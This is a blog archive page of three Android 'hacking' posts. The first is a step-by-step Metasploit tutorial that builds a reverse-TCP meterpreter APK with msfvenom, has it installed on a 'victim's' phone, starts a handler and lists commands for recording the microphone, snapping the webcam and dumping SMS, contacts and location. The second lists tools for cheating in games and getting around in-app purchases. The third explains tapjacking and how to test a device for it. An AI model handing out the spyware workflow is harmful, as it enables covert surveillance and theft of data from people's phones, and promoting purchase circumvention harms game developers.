Showing posts with label android-hacks. Show all posts
Showing posts with label android-hacks. Show all posts

Friday, November 18, 2016

// //

How to hack android mobile phone | Hacking android

Anyone with proper knowledge to hacking can easily hack into anything. By hacking android mobile phone we means getting root access remotely over an android device. We can get our goal done by a lots of methods but what we are going to talk about here is by using metasploit in the kali linux OS. We will create our exploit or malicious apk via both methods.

Hacking android using msfvenom

1. open command terminal.

2. Set payload and create custom windows executable.
Command:
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.8.94 LPORT=443 R > hack.apk

(To know your LHOST, open new terminal and type ifconfig )

Your apk file is being saved in the Home folder.

3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.

4. Start the metasploit framework console as follows :
       
Command:

root@kali:-# msfconsole

5. Now it's time to open and setup multi-handler. Follows the steps :
msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
  
Payload Handler is being started........

6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.


7. Try the following exploit commands :
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate

Hacking android using msfpayload

Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework
2. Android smartphone

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command.
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it 
6.You can distibute the malicious apk using ways listed below which we will make tutorial for in our upcoming posts for now you can read the ways to distribute the app

There are more ways to install the apk on android which you can find via youtube or wait for them on our site.

7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
Conclusion:
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code.

Read More

Thursday, November 3, 2016

// //

How to hack android games (Top 6 Games Hacking Tools and software)

Games Hacking Tools
There are a lot of free games to play.But nowadays Most of the games have in-app purchases options in them.and if we want to play constantly without any limits then we are asked to buy lives in games or like in some cases we have to buy gadgets and upgrades that are required during the game battle or fight to win it and if we don’t want to surf money to buy those stuff then there we need to hack android games.Which really simple if you follow our post to hack android games.
How to hack android games
There come the android game hacks.In Android, there is no difficulty to hack android games and get all the paid stuff in free but you need to have programming knowledge to hack android games or change the games parameters like using cheat engine for hacking games and getting unlimited coins or lives.
Now Some android developers/hackers have made their automatic android games hacking tools which have abilities to hack android games completely or at least change their parameters to get us free credits in a game and lives.These tools are amazing in the sense that they can hack android games.
There are many of these android game hacking tools on the web and also on the official play store of google.But Some of the android games hacking tools works for some version of androids and some do not work the reason is that every game has a certain level of patching by their company.Hackers made the android hacking tools to work for all the versions but as the time passes or the game company found about the hack.They try to patch their service asap.
I created the list of Hacking Tools that will help you to Hack Android Games for Free.or at least these have helped me hack the games data.Also, some of these tools have a paid version which can almost the mod game for any device and for any level of the game.But let’s not get into it right now and read the list of the android game hacking tools
By hacking android game you can unlock all the levels, use any resource according to your wish and lots more. proceed with the method shown below to hack any game on your android.
Now it’s time to hack into the game and use any resources that you want to play at any level of the game. The method is really working and will let you alter the game according to your wish. Just proceed with simple steps below to hack android games.

Requirements to hack android games:

  • Rooted Android Device
  • GameCIH App is used to hack android games
GameCIH is a cheating tool for rooted Android devices that lets you cheat in various video games and also help you hack android games.
By modifying game files or hacking the game code while it runs in memory, GameCIH can change up your gameplay experience in many different ways, such as giving you extra money or lives, making your character invincible, or changing game speed.
The app can also modify your game score and other stats, sending you to the top of the leaderboards.

Hack, App Data is used to hack android games:

Do you want to know what data is saved in an app?
This tool is made for fun to help you to hack apps’ data. It could view some deep information of an app as well as what data is saved for the app inside Android systems.

APK Editor is used to hack android games:

APK Editor is a powerful tool that can edit/hack app files to do lots of things for fun.
It can help us to do things like string localization, background image replacement, layout re-architecting, and even ad-eliminating, permission removing, etc. What it can do depends on how you use it. However, to use it well, we need a little bit professional skills. Don’t be afraid, some examples are given in the help page.
(Note: Manifest editing is not supported in free version)

Slash Game Buster is used to hack android games:

Slash Game Buster
This is a cheating game.
Features:
  1. Easy to use.
  2. APK size is 170 KB only.
  3. Multilanguage (currently supports English, Traditional Chinese).
  4. Programming language: Java + C.
  5. Made in Taiwan.

Usage:

  1. Launch the Slash Game Buster’ (the anonymous icon will appear).
  2. Launch your game.
  3. Click the icon to open the Slash Game Buster’ dialog.
  4. Click `Search’ button and enter the game number current value (after a while of searching, the found count will be showed).
  5. Click the Back button to back to the game.
  6. Play a while to get the game number change.
  7. Repeat the steps 4~6.
  8. The found count is supposed to reduce to 1, and that is supposed to the address of that game number.
  9. Click the address and enter the value you want.
That’s it.

Game Mods is used to hack android games:

To start modding, you must download another app named “ExceedIt” through the page which opens in this app.
About ExceedIt:
A simple app which lets you boost your fun while playing games on your phone. All instructions have been clearly mentioned on the page. Also, there are no online games available.

Xmod Games is used to hack android games:

MMO games is a super mobile game assistant tool with various mods based on jailbroken iDevice and Android (after rooted) device.
About product positioning: MMO games is an assistant tool not a hacking tool, which helps players pursue their goals better and provide players with a better game experience.
We will not harm the game developers or ruin the game for millions of people. In other words, we will never hack gems, coins or anything about In-App Purchase. Besides, we can not change the data in the “cloud” technically and morally.
So Here we end the list of top android games modding apps.These apps can easily help you to modify or hack android games to get unlimited lives and coins for your enjoyable playing of games.If I miss anything regarding the topic of Hack android games.Then let me know in comments.


Tags

”android games hacking, android games hacking tools, android hacking games, android hacking tools, hack android games, hack android games tool, hacking games data, modify games data”
Read More
// //

How to Test Android for Tapjacking Attack

Android Marshmallow Tapjacking Test
The run-time permission model on Android Marshmallow was supposed to make Android devices secure from apps gathering unnecessary information. However, it has been brought to public attention that some malicious apps on Marshmallow have found a way to tapjack your actions into granting them a permissions which you never explicitly granted.
For a malicious app to tapjack your device, it’ll need the screen overlay permission (Permit drawing over other apps).
And once it has the permission, it can potentially trick you into feeding sensitive data. For example, a malicious app with screen overlay permission could place a fake password input on top of a real login screen in order to collect your passwords.
How Tapjacking Works
Developer Iwo Banaś created an application to demonstrate the exploit. It works like this:
  • When an app asks for permissions, the malicious app will cover up the original app’s permission box with whatever permissions it wants
  • If a user then taps “Allow” on the malicious app’s overlay, he/she will grant it the permission that could potentially risk data on their device. But they won’t know about it.
The folks over at XDA, did a test to check which of their devices are vulnerable to the tapjacking exploit. Below are the results:
  • Nextbit Robin – Android 6.0.1 with June security patches – Vulnerable
  • Moto X Pure – Android 6.0 with May security patches – Vulnerable
  • Honor 8 – Android 6.0.1 with July security patches – Vulnerable
  • Motorola G4 – Android 6.0.1 with May security patches – Vulnerable
  • OnePlus 2 – Android 6.0.1 with June security patches – Not Vulnerable
  • Samsung Galaxy Note 7 – Android 6.0.1 with July security patches – Not Vulnerable
  • Google Nexus 6 – Android 6.0.1 with August security patches – Not Vulnerable
  • Google Nexus 6P – Android 7.0 with August security patches – Not Vulnerable
VIA XDA
XDA folks also created APKs to let other users test if their Android devices running on Android 6.0/6.0.1 Marshmallow are vulnerable to Tapjacking. Download the apps APKs(Tapjacking and Tapjacking service helper apps) from the download links below and follow the instructions to check Tapjacking vulnerability on your device.

How to Check Tapjacking Vulnerability on Android Marshmallow and Nougat devices

  1. Install both marshmallow-tapjacking.apk and marshmallow-tapjacking-service.apk files on your device.
  2. Open Tapjacking app from your app drawer.
  3. Tap on TEST button.
  4. If you see a text box float on top of the permission window that reads“Some message covering the permission message”, then your device is vulnerable to Tapjacking. See screenshot below:
  5.                      Left: Vulnerable | Right: Not vulnerable
  6. Clicking Allow will show all your contacts like it should. But if your device is vulnerable, not only you have given access to contacts permission but some other unknown permissions as well to the malicious app.
If your device is vulnerable, be sure to ask your manufacturer to release a security patch to fix the Tapjacking vulnerability on your device.

How to Safeguard yourself from Tapjacking Vulnerability

If your device has tested positive for the Tapjacking vulnerability, we would advise you to not give Permit drawing over other apps permission to apps that you do not fully trust. This permission is the only gateway for malicious apps to take advantage of this exploit.
Also, always ensure that the apps you install on your device come from a trusted developer and source.

Tags

”android tutorial, android tutorial for beginners, tapjacking, tapjacking android, tapjacking poc, tapjacking protection, tapjacking protection, supersu tapjacking, wiki tapjacking, demo tapjacking tutorial, tapjacking example, supersu tapjacking protection “
Read More